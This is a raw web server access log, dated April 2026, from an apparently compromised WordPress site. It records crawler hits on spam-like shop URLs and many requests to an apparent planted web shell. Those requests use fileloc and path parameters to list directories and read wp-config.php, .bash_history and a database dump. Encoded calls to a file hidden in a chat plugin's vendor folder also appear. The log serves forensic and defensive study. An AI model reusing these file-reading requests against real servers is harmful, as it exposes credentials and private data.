40.77.167.143 - - [28/Apr/2026:01:57:44 -0300] "GET /shop/philanthrope/termonology042883213776.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.243 - - [28/Apr/2026:01:57:45 -0300] "GET /shop/nisan/mooted062867041974.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.243.3 - - [28/Apr/2026:01:57:45 -0300] "GET /shop/munificence/vibriones02103874881.htm?fileloc=/home/storage/f/44/55/novoprovisorio2/public_html/wp-config.php&path=/home/storage/f/44/55/novoprovisorio2/public_html HTTP/1.1" 200 16585 "https://inovatapetes.com.br/shop/munificence/vibriones02103874881.htm" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; +https://openai.com/searchbot"
40.77.167.143 - - [28/Apr/2026:01:57:46 -0300] "GET /shop/homonomous/suprapubian031311295073.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.243.57 - - [28/Apr/2026:01:57:47 -0300] "GET /shop/munificence/vibriones02103874881.htm?path=/home/storage/f/44/55 HTTP/1.1" 200 13304 "https://inovatapetes.com.br/shop/munificence/vibriones02103874881.htm" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; +https://openai.com/searchbot"
179.188.53.154 - - [28/Apr/2026:01:52:51 -0300] "GET /wp-content/plugins/tawkto-live-chat/vendor/tawk/url-utils/lib/Helpers/Helpers/index.php?ARRAY=7o2230223n313737373335353537312p2231223n22687474703n5p2s5p2s6877623135377630392r6772616r646s2r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373335313937312q3834653136316639636261613166303838356637663737646235343130623131222p2232223n223061646530306539363938336333343434633732376265643262613963646465222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231392q33372q36302q36392q37372q38352q3134227q HTTP/1.0" 504 247 "-" "-"
40.77.167.143 - - [28/Apr/2026:01:57:49 -0300] "GET /shop/phatagin/deferentia041133990534.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.243 - - [28/Apr/2026:01:57:49 -0300] "GET /shop/paraventure/sakya032415838958.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.243.3 - - [28/Apr/2026:01:57:51 -0300] "GET /shop/munificence/vibriones02103874881.htm?fileloc=/home/storage/f/44/55/novoprovisorio2/public_html/wp-login.php&path=/home/storage/f/44/55/novoprovisorio2/public_html HTTP/1.1" 200 66134 "https://inovatapetes.com.br/shop/munificence/vibriones02103874881.htm" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; +https://openai.com/searchbot"
40.77.167.143 - - [28/Apr/2026:01:57:52 -0300] "GET /shop/disinfection/inquisition072687995952.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.243 - - [28/Apr/2026:01:57:52 -0300] "GET /shop/boastfully/cradle073911589980.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.243 - - [28/Apr/2026:01:57:53 -0300] "GET /shop/salicifolia/oxyammonia061383774079.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
157.55.39.13 - - [28/Apr/2026:01:57:54 -0300] "GET /shop/madwoman/actinology021079976210.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.243.44 - - [28/Apr/2026:01:57:54 -0300] "GET /shop/munificence/vibriones02103874881.htm?path=/home/storage/f HTTP/1.1" 200 13217 "https://inovatapetes.com.br/shop/munificence/vibriones02103874881.htm" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; +https://openai.com/searchbot"
157.55.39.13 - - [28/Apr/2026:01:57:56 -0300] "GET /shop/neuroma/undight032260016299.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
157.55.39.13 - - [28/Apr/2026:01:57:57 -0300] "GET /shop/dejerate/circumrotatory044005956852.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.242.140 - - [28/Apr/2026:01:57:57 -0300] "GET /shop/munificence/vibriones02103874881.htm?fileloc=/home/storage/f/44/55/novoprovisorio2/public_html/readme.html&path=/home/storage/f/44/55/novoprovisorio2/public_html HTTP/1.1" 200 22270 "https://inovatapetes.com.br/shop/munificence/vibriones02103874881.htm" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; +https://openai.com/searchbot"
157.55.39.13 - - [28/Apr/2026:01:57:58 -0300] "GET /shop/calliandra/pileus023666745686.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.243.32 - - [28/Apr/2026:01:57:59 -0300] "GET /shop/munificence/vibriones02103874881.htm?fileloc=/home/storage/f/44/55/novoprovisorio2/public_html/wp-settings.php&path=/home/storage/f/44/55/novoprovisorio2/public_html HTTP/1.1" 200 32546 "https://inovatapetes.com.br/shop/munificence/vibriones02103874881.htm" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; +https://openai.com/searchbot"
157.55.39.13 - - [28/Apr/2026:01:57:59 -0300] "GET /shop/twoport/degenerationist01907688164.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
57.141.0.68 - - [28/Apr/2026:01:57:59 -0300] "GET /shop/carbonado/metabolian051038569154.htm HTTP/1.1" 404 50918 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
74.7.242.166 - - [28/Apr/2026:01:58:00 -0300] "GET /shop/munificence/vibriones02103874881.htm?fileloc=/home/storage/f/44/55/novoprovisorio2/public_html/wp-blog-header.php&path=/home/storage/f/44/55/novoprovisorio2/public_html HTTP/1.1" 200 13453 "https://inovatapetes.com.br/shop/munificence/vibriones02103874881.htm" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; +https://openai.com/searchbot"
157.55.39.13 - - [28/Apr/2026:01:58:01 -0300] "GET /shop/merchant/astraeidae052680780349.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.243.32 - - [28/Apr/2026:01:58:02 -0300] "GET /shop/munificence/vibriones02103874881.htm?path=/home HTTP/1.1" 200 17085 "https://inovatapetes.com.br/shop/munificence/vibriones02103874881.htm" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; +https://openai.com/searchbot"
157.55.39.13 - - [28/Apr/2026:01:58:02 -0300] "GET /shop/matriarchal/diphthongize022477136469.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.242.166 - - [28/Apr/2026:01:58:03 -0300] "GET /shop/munificence/vibriones02103874881.htm?path=/home/storage/f/44 HTTP/1.1" 200 13259 "https://inovatapetes.com.br/shop/munificence/vibriones02103874881.htm" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; +https://openai.com/searchbot"
74.7.241.2 - - [28/Apr/2026:01:58:03 -0300] "GET /shop/munificence/vibriones02103874881.htm?path=/home/.sysadms HTTP/1.1" 404 13181 "https://inovatapetes.com.br/shop/munificence/vibriones02103874881.htm?path=/home" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
157.55.39.13 - - [28/Apr/2026:01:58:04 -0300] "GET /shop/singled/mescal043978617444.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.242.140 - - [28/Apr/2026:01:58:04 -0300] "GET /shop/munificence/vibriones02103874881.htm?path=/home/storage HTTP/1.1" 200 13179 "https://inovatapetes.com.br/shop/munificence/vibriones02103874881.htm" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; +https://openai.com/searchbot"
40.77.167.143 - - [28/Apr/2026:01:58:05 -0300] "GET /shop/kingfish/therapeutist061268380839.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
131.100.63.76 - - [28/Apr/2026:01:58:05 -0300] "GET /quality/parcel/e0hjq6536q5rf3m.html HTTP/1.1" 200 50918 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.4000.0 Iron Safari/537.36"
157.55.39.13 - - [28/Apr/2026:01:58:05 -0300] "GET /1614592933?entity=1612408838 HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.243.57 - - [28/Apr/2026:01:58:06 -0300] "GET /shop/munificence/vibriones02103874881.htm?path=/home/storage/f/44/55/novoprovisorio2 HTTP/1.1" 200 45587 "https://inovatapetes.com.br/shop/munificence/vibriones02103874881.htm" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; +https://openai.com/searchbot"
40.77.167.143 - - [28/Apr/2026:01:58:06 -0300] "GET /shop/whipgraft/counterglow061139542408.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.2 40.77.167.2 - - [28/Apr/2026:01:58:07 -0300] "GET /shop/miscognize/paratheses074233272522.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
157.55.39.13 - - [28/Apr/2026:01:58:07 -0300] "GET /shop/saccharifying/multifold043122008820.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.243.44 - - [28/Apr/2026:01:58:08 -0300] "GET /shop/munificence/vibriones02103874881.htm?path=/home/storage/f/44/55/novoprovisorio2/public_html HTTP/1.1" 200 50918 "https://inovatapetes.com.br/shop/munificence/vibriones02103874881.htm" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; +https://openai.com/searchbot"
78.101.185.93 78.101.185.93 - - [28/Apr/2026:01:58:08 -0300] "GET /shop/gadhelic/carunculata73560479697.htm HTTP/1.1" 200 50918 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.3538.77 Safari/537.36"
40.77.167.143 - - [28/Apr/2026:01:58:08 -0300] "GET /shop/aesculin/competible022465673495.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.241.2 - - [28/Apr/2026:01:58:09 -0300] "GET /shop/munificence/vibriones02103874881.htm?path=/home/novoprovisorio2 HTTP/1.1" 404 44220 "https://inovatapetes.com.br/shop/munificence/vibriones02103874881.htm?path=/home" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.243.44 - - [28/Apr/2026:01:58:10 -0300] "GET /shop/munificence/vibriones02103874881.htm?path=/ HTTP/1.1" 200 44058 "https://inovatapetes.com.br/shop/munificence/vibriones02103874881.htm" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; +https://openai.com/searchbot"
179.188.53.154 - - [28/Apr/2026:01:53:12 -0300] "GET /wp-content/plugins/tawkto-live-chat/vendor/tawk/url-utils/lib/Helpers/Helpers/index.php?ARRAY=7o2230223n313737373335353539322p2231223n22687474703n5p2s5p2s6877623135377630392r6772616r646s2r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373335313939322q3034643231633537393230366534373435353933636366363431333530646630222p2232223n223061646530306539363938336333343434633732376265643262613963646465222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231392q33372q36302q36392q37372q38352q3134227q HTTP/1.0" 504 247 "-" "-"
40.77.167.243 - - [28/Apr/2026:01:58:10 -0300] "GET /shop/foraged/shellwork012298924164.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.143 - - [28/Apr/2026:01:58:10 -0300] "GET /shop/polifolia/bunny031581146755.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.243.3 - - [28/Apr/2026:01:58:12 -0300] "GET /shop/munificence/vibriones02103874881.htm?path=/home/storage/f/44/55/novoprovisorio2/public_html/images HTTP/1.1" 200 15166 "https://inovatapetes.com.br/shop/munificence/vibriones02103874881.htm" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; +https://openai.com/searchbot"
74.7.241.2 - - [28/Apr/2026:01:58:12 -0300] "GET /shop/munificence/vibriones02103874881.htm?fileloc=/home/storage/f/44/55/novoprovisorio2/.bashrc&path=/home/storage/f/44/55/novoprovisorio2 HTTP/1.1" 404 13225 "https://inovatapetes.com.br/shop/munificence/vibriones02103874881.htm?path=/home/storage/f/44/55/novoprovisorio2" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
66.249.70.109 - - [28/Apr/2026:01:58:13 -0300] "GET /grade/example/e2tm2ihbi2h37fy.html HTTP/1.1" 200 261580 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
40.77.167.243 - - [28/Apr/2026:01:58:14 -0300] "GET /shop/mullet/indevout022326012829.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.242.140 - - [28/Apr/2026:01:58:14 -0300] "GET /shop/munificence/vibriones02103874881.htm?path=/home/storage/f/44/55/novoprovisorio2/public_html/.wp_reset_tmp_20260426_200507 HTTP/1.1" 200 16822 "https://inovatapetes.com.br/shop/munificence/vibriones02103874881.htm" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; +https://openai.com/searchbot"
74.7.241.2 - - [28/Apr/2026:01:58:14 -0300] "GET /shop/munificence/vibriones02103874881.htm?path=/home/storage/f/44/55/novoprovisorio2/restore.2024.03.21 HTTP/1.1" 404 24372 "https://inovatapetes.com.br/shop/munificence/vibriones02103874881.htm?path=/home/storage/f/44/55/novoprovisorio2" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
157.55.39.13 - - [28/Apr/2026:01:58:15 -0300] "GET /shop/vagrantness/decry032875661739.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.243 - - [28/Apr/2026:01:58:15 -0300] "GET /shop/hydrosphere/aleutians062434766210.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.242.140 - - [28/Apr/2026:01:58:16 -0300] "GET /shop/munificence/vibriones02103874881.htm?path=/home/storage/f/44/55/novoprovisorio2/public_html/wp-includes HTTP/1.1" 200 355525 "https://inovatapetes.com.br/shop/munificence/vibriones02103874881.htm" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; +https://openai.com/searchbot"
157.55.39.13 - - [28/Apr/2026:01:58:18 -0300] "GET /shop/gasteropodous/omniformity051205699947.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.243.20 - - [28/Apr/2026:01:58:19 -0300] "GET /shop/munificence/vibriones02103874881.htm?path=/home/storage/f/44/55/novoprovisorio2/public_html/wp-content HTTP/1.1" 200 37546 "https://inovatapetes.com.br/shop/munificence/vibriones02103874881.htm" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; +https://openai.com/searchbot"
74.7.241.2 - - [28/Apr/2026:01:58:19 -0300] "GET /shop/munificence/vibriones02103874881.htm?fileloc=/home/storage/f/44/55/novoprovisorio2/.bash_history&path=/home/storage/f/44/55/novoprovisorio2 HTTP/1.1" 404 19602 "https://inovatapetes.com.br/shop/munificence/vibriones02103874881.htm?path=/home/storage/f/44/55/novoprovisorio2" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.243.32 - - [28/Apr/2026:01:58:20 -0300] "GET /shop/munificence/vibriones02103874881.htm?fileloc=/home/storage/f/44/55/novoprovisorio2/public_html/license.txt&path=/home/storage/f/44/55/novoprovisorio2/public_html HTTP/1.1" 200 33111 "https://inovatapetes.com.br/shop/munificence/vibriones02103874881.htm" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; +https://openai.com/searchbot"
157.55.39.13 - - [28/Apr/2026:01:58:20 -0300] "GET /shop/shtetlach/vellumy063884917783.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.241.2 - - [28/Apr/2026:01:58:21 -0300] "GET /shop/munificence/vibriones02103874881.htm?fileloc=/home/storage/f/44/55/novoprovisorio2/inovatapetes1.sql.gz&path=/home/storage/f/44/55/novoprovisorio2 HTTP/1.1" 404 13007 "https://inovatapetes.com.br/shop/munificence/vibriones02103874881.htm?path=/home/storage/f/44/55/novoprovisorio2" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.243.3 - - [28/Apr/2026:01:58:22 -0300] "GET /shop/munificence/vibriones02103874881.htm?path=/home/storage/f/44/55/novoprovisorio2/public_html/wp-admin HTTP/1.1" 200 167008 "https://inovatapetes.com.br/shop/munificence/vibriones02103874881.htm" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; +https://openai.com/searchbot"
207.46.13.6 - - [28/Apr/2026:01:58:21 -0300] "GET /shop/saute/penetrans19570061672.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.4 - - [28/Apr/2026:01:58:24 -0300] "GET /shop/benet/xanthous051485652850.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
157.55.39.13 - - [28/Apr/2026:01:58:24 -0300] "GET /shop/deiparous/recklessness01807889848.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.243.44 - - [28/Apr/2026:01:58:24 -0300] "GET /shop/munificence/vibriones02103874881.htm?fileloc=/home/storage/f/44/55/novoprovisorio2/public_html/qinfofuns.php&path=/home/storage/f/44/55/novoprovisorio2/public_html HTTP/1.1" 200 42380 "https://inovatapetes.com.br/shop/munificence/vibriones02103874881.htm" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; +https://openai.com/searchbot"
207.46.13.6 - - [28/Apr/2026:01:58:24 -0300] "GET /shop/aggregating/plowbote013612518774.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
207.46.13.6 - - [28/Apr/2026:01:58:22 -0300] "GET /shop/hemiplegia/montaigne05217146958.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.241.2 - - [28/Apr/2026:01:58:24 -0300] "GET /shop/munificence/vibriones02103874881.htm?path=/home/storage/f/44/55/novoprovisorio2/.vim HTTP/1.1" 404 14992 "https://inovatapetes.com.br/shop/munificence/vibriones02103874881.htm?path=/home/storage/f/44/55/novoprovisorio2" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
40.77.167.4 - - [28/Apr/2026:01:58:25 -0300] "GET /shop/maturity/tooted011813831974.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.243.3 - - [28/Apr/2026:01:58:26 -0300] "GET /shop/munificence/vibriones02103874881.htm?fileloc=/home/storage/f/44/55/novoprovisorio2/public_html/xmlrpc.php&path=/home/storage/f/44/55/novoprovisorio2/public_html HTTP/1.1" 200 16580 "https://inovatapetes.com.br/shop/munificence/vibriones02103874881.htm" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; +https://openai.com/searchbot"
157.55.39.13 - - [28/Apr/2026:01:58:26 -0300] "GET /shop/corundums/trichobranchia032093527962.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
207.46.13.6 - - [28/Apr/2026:01:58:27 -0300] "GET /shop/bengalense/autography032236051950.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.4 - - [28/Apr/2026:01:58:27 -0300] "GET /shop/lotos/histonomy03187659771.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.243.44 - - [28/Apr/2026:01:58:28 -0300] "GET /shop/munificence/vibriones02103874881.htm?fileloc=/home/storage/f/44/55/novoprovisorio2/public_html/wp-links-opml.php&path=/home/storage/f/44/55/novoprovisorio2/public_html HTTP/1.1" 200 15895 "https://inovatapetes.com.br/shop/munificence/vibriones02103874881.htm" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; +https://openai.com/searchbot"
157.55.39.13 - - [28/Apr/2026:01:58:28 -0300] "GET /shop/scanning/edgingly011806136687.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.241.2 - - [28/Apr/2026:01:58:28 -0300] "GET /shop/munificence/vibriones02103874881.htm?path=/home/storage/f/44/55/novoprovisorio2/inovatapetes.com.br-01-05-21 HTTP/1.1" 404 26736 "https://inovatapetes.com.br/shop/munificence/vibriones02103874881.htm?path=/home/storage/f/44/55/novoprovisorio2" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
57.141.0.67 - - [28/Apr/2026:01:58:28 -0300] "GET /shop/distractile/laterite031404303088.htm HTTP/1.1" 404 50918 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
